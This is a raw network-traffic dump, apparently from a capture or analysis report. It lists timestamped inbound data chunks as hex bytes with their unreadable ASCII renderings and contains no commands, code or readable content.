                                                                                                                                                                          2022-12-05 14:13:35 UTC106INData Raw: dd 3d de 18 bd ca 85 26 36 07 a2 cf f5 ff 44 8b cb 8b 13 70 41 03 e1 23 c8 21 79 32 72 0c 3c 76 85 5b 09 03 c4 52 4d 7f ff 78 90 85 93 50 15 a1 15 f8 07 97 cb cd 24 88 dd 39 5c 39 04 d6 f9 a9 8e 4b fd 36 14 22 52 ad 85 2b 48 08 fc 23 a9 e1 12 5e bb 7a fb 3d b6 0d bc 89 4a 80 78 80 76 5e af 61 97 a2 e9 a2 cb 40 a1 c4 c9 a0 02 c6 4a ff b4 8e d3 c2 7c 7f b6 75 b6 4a 9d ab ae 0b 87 77 b4 e9 73 ce 76 d8 20 33 10 9d 5c ed a4 cf 94 59 47 d1 db e7 da c9 fe e5 25 d5 3f 2c 19 b7 1f 7b 11 2a eb b6 94 10 ce 97 65 5f 56 44 a8 5c 5e 62 f3 d7 b9 84 17 b7 45 89 8b 4a f0 55 48 e8 4c 2c 78 25 4c 9b 32 84 f7 1e 85 f4 1e 37 e4 01 36 ac 2a a7 d2 7a 23 fb d1 87 09 51 12 0f 7c e4 a0 f5 63 8b ec 18 23 16 8c 25 36 29 34 78 87 08 d2 ef fa 25 b3 b2 f3 00 45 eb dd 7d 37 a8 7d d1 26
                                                                                                                                                                          Data Ascii: =&6DpA#!y2r<v[RMxP$9\9K6"R+H#^z=Jxv^a@J|uJwsv 3\YG%?,{*e_VD\^bEJUHL,x%L276*z#Q|c#%6)4x%E}7}&
                                                                                                                                                                          2022-12-05 14:13:35 UTC107INData Raw: 8e f5 5a 38 c8 44 9d 25 b7 df db 0d 98 d7 e3 11 18 74 b2 b8 a6 90 e2 c5 2b 55 21 91 4e b1 f0 f3 93 b8 0b bc ad a5 8f 0d bb d6 1b 0a 9c 00 5f 35 52 14 a0 de ef f3 3c da dd 7d a1 cd 34 34 9d 67 f1 80 c9 b9 15 c6 89 67 a1 9a 6e bb 05 27 10 32 1c 25 13 2b 45 a0 4b bf c0 09 01 69 70 38 aa 53 8c b1 5f 9f 89 2b 8d e1 51 a6 b3 ee 56 cd 48 6d de 79 8f d7 c0 25 d5 2f 52 26 6f fa 7d 89 9f fa 35 fc d8 5a 67 4b ff 3e a6 2f ed 20 d6 10 4a 86 13 7b 19 f0 7d a3 90 7e 9c 90 89 26 05 be 17 70 01 69 a0 37 f8 62 96 17 f4 52 73 f3 1f 97 74 f6 c2 e7 68 b2 f1 96 5d 65 b5 5a 24 4c b2 19 b2 1e 1f 16 a1 f8 5c 9f a1 85 40 7c cc b9 e8 dd de ae 14 11 ea ed 4f b7 e9 b5 ad b9 91 53 28 e6 33 12 d6 ff 0a 92 4c 0f 33 9a bb 5f a6 35 da 9a dd 93 21 c9 f5 b7 d9 33 4a fb 46 93 29 31 8f 8a a0
                                                                                                                                                                          Data Ascii: Z8D%t+U!N_5R<}44ggn'2%+EKip8S_+QVHmy%/R&o}5ZgK>/ J{}~&pi7bRsth]eZ$L\@|OS(3L3_5!3JF)1
                                                                                                                                                                          2022-12-05 14:13:35 UTC109INData Raw: 96 87 31 ee 09 aa 73 a3 0e 67 18 6b 66 55 c8 ea f8 2b bf 0b 16 51 95 f6 40 49 ce 1b 4c b0 a0 e3 b8 15 d1 f0 67 ea 38 d7 84 a1 25 e9 d1 b3 43 39 93 19 c6 37 33 0e 0f e2 28 12 47 e6 32 96 9e 1e 1f ee 09 62 82 17 3d d3 f5 a0 3d 78 66 b8 53 56 f7 1c 8a b4 b2 0a 03 0d f5 81 fe f9 36 42 88 27 4f e6 d6 c5 fa 85 49 3d ae 50 64 96 b9 b2 2e d8 16 2a 67 53 e9 e7 b3 e4 e0 9c 13 9d 97 4d a4 f2 9a 2d 09 18 5a 5d b4 23 15 d2 a9 bc 8b 0b f9 1f 31 dc c6 b8 05 44 50 33 50 ca 7c c4 1d 1f 11 ee 31 3f 12 88 db 07 3e 88 13 c7 db 80 82 5d 56 8b f2 29 5e f5 89 3f aa d7 ea 5b e1 54 6a 23 20 ee 84 c3 de 8a 1c a4 ce 31 43 e4 ec bc da dc 93 13 d1 f4 1f d5 cd 64 99 ae eb 97 38 69 cf 66 c4 3e d8 cc f4 4f f0 14 10 ec 8a 36 b9 ea 1f 67 b3 2d 3f 0b a0 96 7c 51 fe 79 99 8e 01 aa 9e 50 a7
                                                                                                                                                                          Data Ascii: 1sgkfU+Q@ILg8%C973(G2b==xfSV6B'OI=Pd.*gSM-Z]#1DP3P|1?>]V)^?[Tj# 1Cd8if>O6g-?|QyP
                                                                                                                                                                          2022-12-05 14:13:35 UTC110INData Raw: f9 3c c0 1d 1d 76 a8 3f ff f9 d4 e6 09 9a d7 1d 27 22 d5 46 61 6a d4 b0 3f c2 96 ca a7 7c a2 f2 23 8e 19 cb 9d 3c 06 ce 9b ac 8e ad aa 15 e0 af de 4c f7 17 18 a7 1d 48 9f 49 05 90 15 09 13 98 f1 ae 17 5c 63 b2 a1 86 a0 d5 b8 db b8 9b ca 02 e3 60 74 6e 6a 00 10 b8 93 bd 0c d6 76 f8 32 de 42 fa e4 07 f6 0b 04 2f dc 77 3b ba 9b f0 ae c3 27 11 5a b9 a8 71 d8 56 8a 58 fd 16 48 aa 37 ab 29 f1 24 4c a9 38 93 01 fb e5 d8 48 65 30 c2 d8 88 93 8b 28 55 19 cb 11 d9 ee ac 78 40 cb 8f 40 1a 8e ca 3e f6 9f 21 65 5f 20 a6 df a4 44 01 75 50 2e a5 c3 27 3e 0f ca 05 78 22 0b 83 27 bc c5 8b ec 57 f0 c8 31 9c 76 56 ae 78 0c 7a 2d 3b b7 63 0d 5a 6c 92 14 f6 09 c2 8c 74 95 5f c7 47 29 a0 f9 e3 da ae bc 28 a6 f7 6a a5 32 fd a0 09 af db 65 a4 cd a7 e1 46 5f 6a 68 4f 09 d6 f4 71
                                                                                                                                                                          Data Ascii: <v?'"Faj?|#<LHI\c`tnjv2B/w;'ZqVXH7)$L8He0(Ux@@>!e_ DuP.'>x"'W1vVxz-;cZlt_G)(j2eF_jhOq
                                                                                                                                                                          2022-12-05 14:13:35 UTC111INData Raw: 2b a6 f7 a0 44 5b b5 d6 67 b9 06 f7 e2 1c 0a f8 ef 78 b9 1c bf 62 7c ef 79 35 93 b4 e9 58 b8 b5 47 13 f4 b9 f2 7b b5 64 cc 45 dc 19 d0 5b 38 8f 0b 4b ee 53 d6 9c 9d c5 a0 21 91 60 ca 5f fd ec 9b 3d 44 43 d6 c7 0e 6c 6c 07 f9 de 7b 79 0a 49 c2 ee ae 4b 0d 76 12 fa e8 33 7c 72 e4 4b f7 98 ea 83 86 14 ab 5c fc 33 78 ca e0 98 b9 c8 1e ba 9c b2 01 5a 92 f6 e1 7d b6 bb 79 16 1e 33 d8 e3 7e f7 7e 78 4c 6d 45 08 73 e0 c2 45 36 61 f8 51 00 2a 79 7d b0 31 a1 c0 60 d8 32 56 7b 6a a8 e2 53 99 73 95 4a 38 f7 4a 5e e5 2c 17 f7 49 d7 d2 bc 42 d5 ce cb 0e 16 f3 48 96 f3 d8 da c1 60 17 ad df c8 7f 80 08 98 db fd a9 a3 51 2e 61 75 12 2c 19 19 df 4b 9c 65 8f fb f7 c3 fe 24 05 55 15 51 71 0d 27 d3 42 7f f2 81 f7 94 2a 56 55 11 ca 2e 77 ca f4 7f 68 9b f3 63 c8 35 fe 35 2a 94
                                                                                                                                                                          Data Ascii: +D[gxb|y5XG{dE[8KS!`_=DCll{yIKv3|rK\3xZ}y3~~xLmEsE6aQ*y}1`2V{jSsJ8J^,IBH`Q.au,Ke$UQq'B*VU.whc55*
                                                                                                                                                                          2022-12-05 14:13:35 UTC112INData Raw: c1 a4 2b 32 11 38 0b 64 d1 f3 66 a4 cc 74 7b 67 88 0d 34 66 67 ad a9 0d 57 8a 9a 55 fa fc 22 57 9a 09 42 5e cc 66 49 3a 3d 3d be af 64 51 f9 af db a0 39 cb a8 53 44 8e 25 e9 7b 33 64 cf cb 63 2e 15 28 8d c9 a2 bd 38 a1 b2 25 e7 c3 31 b1 a6 78 ae 99 5f ad 1d c7 ce f4 c3 40 06 c9 1c 17 0d 05 ea 43 c8 8a 26 0d b8 10 15 42 bd ed 86 a4 ab 4d 9a f1 8c 52 47 a3 83 3e 1b 44 9a bd 50 7b c2 98 39 4e 37 b3 97 c4 d4 c1 8b 9d 93 01 ba df b3 84 0d f7 4d e9 6c 37 6c 73 fd c8 10 ad 9f 4e 05 c1 36 12 9e 6e 5a 6b 94 89 6a 04 55 d7 47 7c 27 76 36 f6 05 95 9b 7d e5 ba d4 81 09 d3 da 81 39 82 1c d3 46 59 3a a8 08 87 fe 96 24 42 53 8b 67 76 20 c0 00 a8 30 b4 9f 6b f6 9b eb 9b 5a a1 c6 43 0c bd 73 a8 34 48 48 21 a1 5c 2f 82 48 23 25 3d 03 31 d2 9c 69 5e 06 eb f6 1f 71 4d 34 90
                                                                                                                                                                          Data Ascii: +28dft{g4fgWU"WB^fI:==dQ9SD%{3dc.(8%1x_@C&BMRG>DP{9N7Ml7lsN6nZkjUG|'v6}9FY:$BSgv 0kZCs4HH!\/H#%=1i^qM4
                                                                                                                                                                          2022-12-05 14:13:35 UTC114INData Raw: a4 b3 b1 66 0c fa 70 56 1d 9c 80 b0 b2 89 62 cb 72 7c 52 b3 31 6f bf e5 3e f1 dc 80 bc ab 8a 6a e8 89 5f 53 14 48 81 28 8d 9c 74 1e 44 c1 3e 3b 80 0d 0f 18 2f 75 77 ee f0 0c d0 1d c4 68 17 77 a8 08 49 e9 f6 20 9c bb 35 0d 07 7a 54 94 d5 c6 b0 63 e2 e2 4e 15 58 b9 78 b5 55 ed b7 75 a1 9c 26 7c fd 9f 67 93 84 1b 1d 87 94 b7
                                                                                                                                                                          Data Ascii: fpVbr|R1o>j_SH(tD>;/uwhwI 5zTcNXxUu&|g
                                                                                                                                                                          2022-12-05 14:13:35 UTC114INData Raw: b7 4f c7 a9 11 d6 60 ab 4a e4 22 c0 de a0 f4 5b a1 4c 7d 5e 7a f8 54 44 cf 6b 05 e4 4a 0c 1b 1b 1e 4e 82 0c b8 cf cd 92 c8 93 f9 d1 08 8b 9d 9a e4 e2 9f 68 ff 5b 6c 05 73 05 93 f4 21 72 47 62 9b 9d 68 82 11 89 2f c1 a3 92 87 38 7a 15 8a cd 7c c1 b0 5c 79 cd f0 a5 c1 bb 50 3b d6 02 0d ac b9 d4 79 ff b0 4b 42 45 fb ef da 2d 12 3d 19 a0 ef 1f 2a f9 0d 21 94 cd b6 56 a8 40 5c be dd 47 b5 8e 65 64 aa f7 ec a3 87 f6 20 dc f5 48 44 9c 12 e2 e2 1a e2 9f 14 a2 7a b5 bb 74 45 72 16 03 36 c6 3f db 4d 11 ee dc c4 a0 d4 a2 ba 7d d9 f4 fb 04 25 2a 24 42 e1 76 04 0d b7 ad f0 d3 fe 8c c2 2e 9d ae 4e 97 d8 4f 99 c3 bb 1b 19 d7 0f 28 59 c3 42 40 77 0d 72 91 38 89 56 b8 10 1e d7 59 27 c5 aa 2c ac be 92 b6 24 64 be 43 72 c8 86 54 11 c3 fc ef fa 66 34 12 5e fe 9f dc bc 57 d3
                                                                                                                                                                          Data Ascii: O`J"[L}^zTDkJNh[ls!rGbh/8z|\yP;yKBE-=*!V@\Ged HDztEr6?M}%*$Bv.NO(YB@wr8VY',$dCrTf4^W
                                                                                                                                                                          2022-12-05 14:13:35 UTC115INData Raw: 94 09 9b 2a 8b 10 2e 20 1b 6b a8 69 9f a9 d1 f6 07 70 69 21 1c 26 68 9f 84 15 ea 4c 6d a8 52 77 be 31 c4 59 b1 56 f0 47 27 a2 a7 56 8a 43 01 a6 78 dd 87 15 08 74 71 c2 cc 83 c4 bd d7 84 cf 7e 81 a8 94 cc 6d 97 66 c1 f1 05 2c 54 ee 6e 69 10 7a 59 a2 32 de d6 2d 74 f3 e0 e5 ca eb ac 1f 32 97 dd 3f e5 b2 ff a5 b4 35 42 61 16 52 a1 cc 2a 1b d8 a2 9c 99 c9 04 ec b3 42 24 b2 82 65 be 76 a7 94 d0 02 b5 2d 3a 59 0a 65 00 03 d4 d6 a6 28 1f 66 33 3e 1b b6 c1 ed c6 6b 59 77 db fe c5 a9 43 ee bf 7d 2c ee 6b b7 34 7c 9b 31 37 62 2f 8f 02 32 ad 6b 26 59 9c d6 f1 13 47 a0 cc 61 c7 15 f4 70 b1 57 53 9c 30 d6 83 1d 6d 55 02 35 a0 b4 4d 12 04 0f a8 48 a4 d8 e4 6c d2 2d f8 9f d5 e7 28 01 2f 04 89 13 c5 59 0b e6 b2 55 64 a3 a3 7d 4e 84 82 ac 0f ae 34 3e b7 04 2a e6 f5 28 0a
                                                                                                                                                                          Data Ascii: *. kipi!&hLmRw1YVG'VCxtq~mf,TnizY2-t2?5BaR*B$ev-:Ye(f3>kYwC},k4|17b/2k&YGapWS0mU5MHl-(/YUd}N4>*(
                                                                                                                                                                          2022-12-05 14:13:35 UTC116INData Raw: 2a 3b 83 a4 97 ef 0e da 93 bb 25 a0 5e 71 c1 b1 a2 ec cb 3f 36 8e 53 2f 69 f0 8e fe f1 12 af 09 97 c1 1c ca 60 4d f2 71 12 59 d3 0c 33 b8 00 2c e4 ff fa 30 8e 4b b5 bc 22 0d d7 86 4d 0b bf 2d 3a 35 85 a1 3c fc f9 2a db 80 0b d2 22 ef fb de 5f d6 72 e7 4f f7 d0 d5 4b b7 ad 86 ae 56 4a 0a 68 35 3d a7 63 48 de 81 2d 5c 65 b4 6c f3 96 09 76 7b 04 ec af 98 3a 93 1a 73 76 20 6b aa 91 06 f6 a5 96 41 b8 89 be 2d d6 5f e8 f0 48 9e 36 91 8c bc b4 4e 92 46 4e 90 6e 00 aa 3a 00 28 8e f7 5d 33 0d 38 8e e1 73 97 27 64 e4 5e 6d f4 0c 0d 96 3b 97 cf 92 c0 e5 dd db ec 0b 32 b9 35 74 09 56 b7 8a 23 a3 20 66 5e 5b 7f 2f ad 72 67 86 92 a1 5f 67 20 d5 18 26 00 11 12 e1 53 dc e0 5c eb 34 41 53 03 64 3c cc 96 e1 d8 e9 a5 17 62 56 3d 95 aa 81 3a 60 85 27 07 02 7a 93 ad 00 df fb
                                                                                                                                                                          Data Ascii: *;%^q?6S/i`MqY3,0K"M-:5<*"_rOKVJh5=cH-\elv{:sv kA-_H6NFNn:(]38s'd^m;25tV# f^[/rg_g &S\4ASd<bV=:`'z
                                                                                                                                                                          2022-12-05 14:13:35 UTC117INData Raw: df 62 ec e8 8c 35 c7 33 e7 a1 f7 7e 63 ae 23 40 09 f3 55 60 1c bc ff 21 8d 1e 02 0d 89 b5 aa 28 d7 6c 7d 37 6e b5 c5 09 20 0c 25 f2 ec b4 6e c7 ba ed b4 96 82 12 73 7d fa b2 52 d8 f7 ec ce 9c db b6 8e 06 a9 57 13 d4 0f a6 8e 7b 18 8d 7f bd ab 27 0d f6 ca 80 dd 71 2e 03 f3 3c 18 b5 82 4f 48 e3 8c 9e b0 a0 fe ce 7b 02 03 22 65 a9 44 f5 48 37 49 e3 88 f7 8f 08 6c 97 ee 91 aa 8f 5a f7 1b 53 ef f1 62 56 91 9a 5f d2 8c 92 6c 8f ec ca 80 94 48 7f 63 c0 1c 2f 72 76 ae 5c cb 8a c2 f7 42 dc 18 7a eb 64 cb 02 01 be 45 92 88 ce b9 db a1 b2 50 56 08 80 db 54 35 71 57 21 ab 03 0a 02 30 a6 dc 1e 18 bf ae b8 7b ca 6d 6a e4 08 1d 55 6c 42 00 1a f8 1a 08 9e 46 fd c2 ca 47 c4 b2 8a 65 1f 58 fa 08 97 bb d8 69 84 24 58 39 34 c3 0a 6a 8b ff 58 e5 57 7c ea 4d 56 a1 60 1f 8c 95
                                                                                                                                                                          Data Ascii: b53~c#@U`!(l}7n %ns}RW{'q.<OH{"eDH7IlZSbV_lHc/rv\BzdEPVT5qW!0{mjUlBFGeXi$X94jXW|MV`
                                                                                                                                                                          2022-12-05 14:13:35 UTC119INData Raw: a0 36 22 1f 7e 46 58 48 38 f9 70 2f 6d 1c da f9 86 27 cb c3 59 5d 3a 87 71 fb 52 f9 c3 d6 45 1f af 0c 5e 51 a9 5d ee b5 d2 f3 ee 3f d8 07 b0 11 a3 88 84 27 b2 1e 5e d6 1e 02 44 16 8a b0 f8 0e 52 9e 8a 47 1c 31 93 06 00 89 45 0f e7 63 35 ac ad e1 58 e4 2d 79 03 aa c0 e8 94 b3 26 21 b8 57 a8 78 c2 3e c1 dd 06 33 ea 3f e9 c3 48 96 62 dc 10 93 12 55 91 8a b9 5c 9a 2f 00 96 c4 9b a3 07 66 63 5d 45 64 db a9 85 c8 14 92 fa 57 9c d9 98 44 aa 5a d6 d5 5d b8 d9 87 a8 1c 6f 7a 50 39 e2 6a 7d c2 61 2c 9f c7 bc 34 39 e6 27 17 1a 30 89 1b b4 08 96 47 51 25 0b 79 33 9c a5 03 13 b6 4a c3 7f a7 0f e1 08 c4 e9 0f ea bf b3 41 19 a1 57 f4 fe f7 dd 1f 95 ab 65 52 2c 50 0f d1 6e 31 7f e4 e9 b9 5e f5 a0 35 33 97 d2 b9 b4 24 ed 43 cd ae ea 38 28 32 5c 84 d6 90 bd 21 36 8e cf 49
                                                                                                                                                                          Data Ascii: 6"~FXH8p/m'Y]:qRE^Q]?'^DRG1Ec5X-y&!Wx>3?HbU\/fc]EdWDZ]ozP9j}a,49'0GQ%y3JAWeR,Pn1^53$C8(2\!6I
                                                                                                                                                                          2022-12-05 14:13:35 UTC120INData Raw: a6 72 60 02 02 68 79 4a 0e 91 2c 49 fd 21 d3 78 b3 60 3d 48 af 86 b8 4e 97 81 8e 6a 2a ad 2a c3 5a c9 b4 7d 37 30 61 45 35 7b a3 92 46 79 e8 78 c4 c9 5f 0b 89 6c 78 75 ee 34 a7 36 ad 35 17 24 2f 63 bc ad 55 7c f1 42 ed 66 fe 1b cd a5 25 bf 6b f4 13 3f 88 e8 86 7f 8b cb 80 a5 bb 47 fd 9d 13 01 39 1a c2 c2 ba c7 94 37 8d f9 5c 0f c2 71 24 4d e9 6e e7 28 5b 9c de 3a 0c 01 a3 c5 ec 5a 3c e2 aa f4 6d ed f4 20 60 64 80 e7 ab a5 3e 6b 1d 5c 53 cf 90 d5 00 1d 9a b5 9d d4 88 03 f4 17 24 fa 66 ae ac d9 b7 fa 09 1c f3 ab b4 71 69 7c 4e d9 15 84 7a 8f ca 62 44 45 33 3d 9b 87 97 f9 07 52 4f d1 82 24 43 5a 81 33 e3 47 66 ec ff 51 a3 02 bc 78 2b 1e 22 02 5a 40 61 c4 20 d0 74 15 e9 3e 79 b4 30 a3 da 8e 42 53 aa 3e 1f b3 1a 48 78 41 f1 e8 96 3b 3a e8 12 e6 ca 77 69 d5 8e
                                                                                                                                                                          Data Ascii: r`hyJ,I!x`=HNj**Z}70aE5{Fyx_lxu465$/cU|Bf%k?G97\q$Mn([:Z<m `d>k\S$fqi|NzbDE3=RO$CZ3GfQx+"Z@a t>y0BS>HxA;:wi
                                                                                                                                                                          2022-12-05 14:13:35 UTC121INData Raw: d5 88 cd 2e a3 64 14 03 a4 58 d2 64 52 ef 6d 24 dc c6 3f f5 25 81 b6 2f c5 0f b9 6f 6f 01 9d d4 40 75 20 c4 51 99 58 ff e0 7f 25 6f 70 1a 75 c1 9e a7 a5 93 82 80 92 f5 93 18 7c e9 86 0e 27 2d 38 b5 d8 2c 57 70 27 00 07 d7 fd 06 49 51 10 d8 44 03 e8 11 24 ba ef 57 06 57 84 06 62 b9 c2 e6 25 2f eb dd 98 6c 4b 4b 3f e5 4a 92 c9 94 a8 1c 70 38 d7 5f 58 9f 3c 05 2e e3 db 4b 7b 6d db 07 40 e1 95 ef 9c 6a 5c b6 49 f2 eb 9b e3 dd cc 62 14 1a 6f 84 88 3c 4d 33 d4 cb ac ca c5 5b 9e b1 82 8b 1d 01 b5 76 9b 26 99 34 03 2f 8a b5 8f 81 36 4e 8b 47 81 58 a6 14 ac 47 7c f4 1c e9 17 21 3f 00 6a 2a 8f 66 57 c9 9d ff 16 44 91 de b4 ab 8b bc ec 62 3c 97 27 7c 9b 68 26 42 8e e3 fa 74 cc 8d 3f dc b4 41 0e 25 8a a2 0c e0 4a 56 6e 7b a7 af b7 81 11 13 53 29 6a f9 45 62 03 9a 6a
                                                                                                                                                                          Data Ascii: .dXdRm$?%/oo@u QX%opu|'-8,Wp'IQD$WWb%/lKK?Jp8_X<.K{m@j\Ibo<M3[v&4/6NGXG|!?j*fWDb<'|h&Bt?A%JVn{S)jEbj
                                                                                                                                                                          2022-12-05 14:13:35 UTC122INData Raw: 2a 71 6f d3 02 63 26 5e 33 e2 6f 55 dc b4 1c 28 cd f4 a5 36 0b 1c d7 d6 24 c6 32 50 07 b8 a0 3d 0c 0c 27 54 0d 65 b0 3c 68 22 7b 6a 9a 9b 1a b1 e6 e1 43 96 1f b6 5d 45 fb 10 e8 d8 7f aa 63 4f 7d d9 c9 50 03 af 97 42 a2 e5 4d 91 c8 b0 0d 86 8a 0a 19 0c 3d 9b b5 26 8a 2c 66 d7 1d 33 9a a3 8a 70 af 92 d5 59 c9 d8 7a 75 bf 1e af 47 81 e3 d7 49 76 63 da 1d 64 d9 53 75 2c 85 13 6f 6b 9e 13 07 3a 73 5e 18 1d 62 90 63 30 b5 e6 da 62 66 d2 3a 39 06 1c b0 5d bf 56 de c1 c3 60 91 97 23 4b b5 c7 b3 4c 02 9f 43 89 d7 c5 37 fd 8f b5 68 dd 7e 4a 64 96 7f 8f c1 75 6f a0 53 5e 15 30 66 a5 b6 54 5b 87 8b 7f 6f a3 e3 94 d4 39 79 86 61 03 52 30 26 df 03 55 cf 29 a3 1f 11 3a a3 ae d3 ff 34 88 a6 db 26 bc b2 19 f1 f4 b8 2f 41 97 87 8b 14 68 02 f2 9c 6d df c1 54 ba f0 08 ce 84
                                                                                                                                                                          Data Ascii: *qoc&^3oU(6$2P='Te<h"{jC]EcO}PBM=&,f3pYzuGIvcdSu,ok:s^bc0bf:9]V`#KLC7h~JduoS^0fT[o9yaR0&U):4&/AhmT
                                                                                                                                                                          2022-12-05 14:13:35 UTC123INData Raw: e0 03 b2 c2 13 9c c9 7d da bb 64 91 78 7f 4f 35 c3 89 6e d4 72 33 a7 68 54 52 b0 65 fb 81 2f ff d0 cb 0a 39 3f c5 ce 75 3a 7f ea a2 f9 b2 ba 95 55 ef cb 5b 2f 6f ab d6 14 4a 7e 65 6e fb c3 4d 0f 32 18 64 17 f3 15 6c 22 86 99 5d e4 bf dc 9a b2 06 90 39 35 5b de bb ee b0 53 61 92 4a 9b 23 80 7a 76 e8 9f 9c 34 8f 42 60 51 79 85 9a 66 56 c4 b8 10 f6 9d 02 75 ab f4 64 59 d6 fe 10 20 2b c7 33 14 ac 3d 91 6f 59 1c a4 ff d1 7c 76 c1 7c bb e9 2e e3 07 df 4c 26 99 36 d0 db 33 81 b6 cd d8 66 46 1c 5b 11 45 7b dd 39 71 77 8b 03 eb 46 f4 05 df 6d 78 43 0a 13 df 25 cb aa 41 0c 52 10 c0 11 4b df 1e ce a5 4e 07 a8 da 3d 11 be dc a9 51 2c 68 09 0b 20 4c e1 fe 81 21 5c 69 11 e7 e3 88 47 3c 55 f4 d8 d9 dd b0 9f 5c f6 3d 0a 68 41 f5 11 e2 50 ad d0 22 9e 21 bc 8e c8 5f 38 ff
                                                                                                                                                                          Data Ascii: }dxO5nr3hTRe/9?u:U[/oJ~enM2dl"]95[SaJ#zv4B`QyfVudY +3=oY|v|.L&63fF[E{9qwFmxC%ARKN=Q,h L!\iG<U\=hAP"!_8
                                                                                                                                                                          2022-12-05 14:13:35 UTC125INData Raw: 10 54 6d 36 cc 09 38 12 65 81 6c 46 cc 62 80 f2 49 de c0 b5 fb a8 7e 01 67 7c 7a 30 c0 17 83 58 1a 7c 3c a4 46 3b a7 55 38 c9 36 ce d3 37 10 2f 62 16 02 18 68 77 ae cf 48 ec b8 13 8c 03 97 9e 75 d5 75 4e 90 27 21 5c 50 34 f6 ff 92 bf 6a f6 dc 8c 87 a4 7e 6a 46 50 6e 53 65 6d 7c 52 97 aa 48 be 24 ca 0d 9b 1e dd 79 d6 cb 16 79 4e ec 78 ec 09 40 ab 46 0f d7 93 e7 9d 3c 78 3a 24 40 bb 6f f9 5c 4e f0 9a 21 a0 ef 04 a3 5c ce b3 3d 7a 5f 27 5c 40 3d f6 7e 2a 0e de 28 2e e8 e0 74 fd ea 15 07 c2 ff 26 e9 34 db 5b ed 62 b2 82 32 1f c5 32 be 1a c7 79 bd ac c7 84 9e ee 0b 53 88 ee 9b 08 12 fa 53 d5 9e 75 0b f4 f4 1c fc e8 67 10 30 f7 85 58 61 65 60 dd fd d6 fe 94 3a 0c 88 4e 31 ca 0e da c1 4c f4 2e 26 5d bc fa 66 df a2 54 5d 79 0c df 36 83 3f 69 f6 c8 aa cd 08 3f 0c
                                                                                                                                                                          Data Ascii: Tm68elFbI~g|z0X|<F;U867/bhwHuuN'!\P4j~jFPnSem|RH$yyNx@F<x:$@o\N!\=z_'\@=~*(.t&4[b22ySSug0Xae`:N1L.&]fT]y6?i?
                                                                                                                                                                          2022-12-05 14:13:35 UTC126INData Raw: af 0d c5 e9 e8 02 06 75 79 53 2d 84 05 75 b3 b7 a0 49 49 2e 26 31 93 a4 27 c1 41 12 c0 05 a5 ee bb 51 47 21 c8 a3 7f 60 b7 c3 34 be 9a 1e 9d 54 98 00 43 d8 51 01 b8 a2 e9 82 0d d6 f3 f8 ab f5 ff cd e3 b5 a1 ac 94 5a 26 9e b1 91 25 13 ac db a2 f5 56 21 83 c9 69 65 3b cf b1 b4 ba 22 b3 68 ae 26 18 b4 a5 12 eb f2 42 70 22 c7 50 31 90 db 67 78 64 e2 d8 57 a0 82 d6 4b 23 cc 8a c7 2c d3 fd 1a 60 a0 ec 34 08 ae 5f c4 df f6 b8 19 41 ef 03 26 c0 64 0d 84 0f bf f5 51 b6 f0 01 1e ad de c3 58 4f 37 d6 2f 80 15 23 95 9e f9 16 a1 5b ac 42 00 d3 10 b1 74 66 5e 67 d4 f3 3c e3 7f 21 a8 0d 3f 58 68 1e 5b d9 5e 84 66 ae 6a 4b b3 a7 d7 db 3b 36 d8 66 07 f2 f7 c5 49 d6 5e d4 87 fb b7 0f ef f7 a7 ad 5c 9c d9 67 33 b5 97 0f 40 1f ed 16 5c ad f9 14 f7 1d 9f 04 44 4d 16 ff cf 90
                                                                                                                                                                          Data Ascii: uyS-uII.&1'AQG!`4TCQZ&%V!ie;"h&Bp"P1gxdWK#,`4_A&dQXO7/#[Btf^g<!?Xh[^fjK;6fI^\g3@\DM
                                                                                                                                                                          2022-12-05 14:13:35 UTC127INData Raw: ee 8a a0 e8 e2 68 f7 13 61 53 e0 07 24 b9 93 20 9d ff 38 b3 99 d3 1d 56 64 76 f7 43 eb b5 a1 09 23 4c c0 ec 37 15 56 83 e0 f4 e2 63 4e 81 8d 98 7c c7 79 56 9d bd ca 7b f6 c8 09 eb 5a 4e c9 b0 04 3e 10 05 f4 fd 4f 15 3c 5c 3e dd 19 b3 97 6d c7 7a 76 21 6d 08 be 91 a0 7e fd bb bb 8e 83 5d 92 c9 2d 53 dd d5 77 6b 14 aa 6a b7 96 b2 42 00 1c 19 98 45 74 62 8f 6b 0d ba b7 c7 0f 6c 14 d7 13 1e a3 af 65 42 46 57 b6 c2 65 51 35 4f ec 13 e0 57 43 e8 26 54 c5 f1 18 49 45 cd d9 e4 b8 d8 57 86 fc b4 92 e5 3e 74 26 2c 8d b8 ea be 51 ed 20 7c c8 01 fc 1a 69 da 3b 67 00 2c a9 5f 91 5d d3 1d ff 3f 37 b0 c6 16 d4 fa 9f c4 3c 3d 9e 4a 18 1f 42 47 eb 79 81 28 42 a3 b9 dc 78 34 19 43 a4 3a 4d 03 b1 f7 a1 7f ea 96 79 53 0b 3c b7 00 ba 6f 82 2d 3b 11 45 b8 9b fd c8 cb c5 31 53
                                                                                                                                                                          Data Ascii: haS$ 8VdvC#L7VcN|yV{ZN>O<\>mzv!m~]-SwkjBEtbkleBFWeQ5OWC&TIEW>t&,Q |i;g,_]?7<=JBGy(Bx4C:MyS<o-;E1S
                                                                                                                                                                          2022-12-05 14:13:35 UTC128INData Raw: 3b 76 95 ef 59 6f 1a 10 5a 9a 49 3b ad f5 a2 d4 17 b6 b7 51 a7 d5 03 b4 b4 95 d8 89 65 ce 4c d6 80 20 37 eb f1 83 05 27 d3 54 9f 6c 4b ba 5c 70 8e 30 38 c8 3f 2a e7 f5 c7 4d aa 5e 9c d6 13 40 82 55 7a eb 07 9f fc 9d 77 0d a0 4c 58 cf 28 84 75 9c 08 60 a2 f1 5c 4a 88 c6 8f 17 95 f4 17 c8 d6 f6 77 14 04 c8 60 e0 09 30 8b 54 9b df a3 8f cd 4a 9d 9e 0e f8 ef b9 ce 7e 3d 8b 11 ef 9a a7 91 16 b6 61 a3 a1 34 5c 7f 61 c7 ca 07 ed 59 19 8e 98 ed eb e1 1e 89 d7 54 75 e2 4c ff 72 70 12 9c de f5 6d 83 7f e4 95 b9 5c db 82 64 f0 f9 41 d7 2a ef f9 d7 3f 55 4e 65 a9 5a dc 3e af 22 73 a9 cb 0b 01 ec 54 7f c1 41 e5 3f 04 e4 0b c7 64 d7 a1 c9 e2 d9 5b 54 6a 83 82 5e 76 b6 ac b9 97 54 8b ca 73 d4 e0 6a 1e c0 bc bb 78 33 4d 1e 97 f1 22 a1 85 24 4b 07 82 9d 33 61 f0 30 f4 cf
                                                                                                                                                                          Data Ascii: ;vYoZI;QeL 7'TlK\p08?*M^@UzwLX(u`\Jw`0TJ~=a4\aYTuLrpm\dA*?UNeZ>"sTA?d[Tj^vTsjx3M"$K3a0
